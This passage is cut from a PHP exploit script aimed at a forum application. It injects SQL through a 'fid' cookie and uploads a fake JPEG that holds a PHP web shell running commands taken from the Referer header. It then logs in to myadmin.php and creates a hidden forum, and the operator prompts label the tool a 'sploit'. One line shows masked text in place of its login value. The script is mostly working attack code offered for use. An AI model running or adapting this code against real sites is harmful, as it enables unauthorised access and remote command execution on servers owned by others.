}
}
}
$salt = !empty($vars[2][4]) ? $vars[2][4] : 'atk';
# Always the same salt ...
print "\nsploit> Salt -> {$salt} (Standard DES hash)";
print "\nsploit> Enter the decrypted password to continue: ";
$password = trim(fgets(STDIN));
$xpl->addcookie("fid", "-1 or 1=1");
$xpl->cookiejar(1);
print "status> Uploading a malicious picture";
$formdata = array(frmdt_url => $url . "?owner={$owner}&action=profile", "email" => "{$name}@hotmail.coum", "url" => "http://", "upload" => array(frmdt_type => "image/jpg", frmdt_filename => "hello.jpg", frmdt_content => "<?php print 337666733;@extract(\$_SERVER);@system(\$HTTP_REFERER);print 337666733;exit(0); ?>"), "avatar" => "./avatar/welcome.jpg");
$xpl->formdata($formdata);
print "\nstatus> Trying to get logged in";
$xpl->post($url . 'myadmin.php?action=login', 'login='******'&passwd=' . $password);
if (preg_match("#ATK_ADMIN#i", $xpl->showcookie())) {
print "\nsploit> Done";
} else {
die("\nsploit> Exploit failed");
}
print "\nstatus> Creating a hidden forum";
$xpl->get($url . 'myadmin.php?choix=2');
if (!preg_match("#<option value='(\\S+)'#", $xpl->getcontent(), $styles)) {
$styles[1] = "xml_BlueLight";
}
$xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject=");
$xpl->get($url . 'myadmin.php?choix=1');
if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) {
die("\nsploit> Can't retrieve the forum id");
}
$forumid = $fid[1][count($fid[1]) - 1];
